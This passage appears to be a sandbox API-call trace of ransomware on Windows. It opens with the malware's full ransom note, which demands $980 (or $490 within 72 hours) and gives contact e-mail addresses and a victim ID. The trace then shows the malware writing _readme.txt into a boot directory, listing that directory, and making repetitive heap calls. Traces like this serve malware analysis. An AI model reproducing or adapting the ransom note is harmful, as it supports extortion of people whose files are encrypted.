ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.646] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.646] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.646] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.646] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.646] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.646] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.646] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.647] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.647] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.647] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.647] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0209.647] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0209.647] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.647] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.647] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.647] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.647] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.647] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.647] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.647] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.648] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.649] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.649] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.651] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.651] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.652] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.653] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.653] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.654] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.654] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.655] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.655] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.656] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.656] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.656] 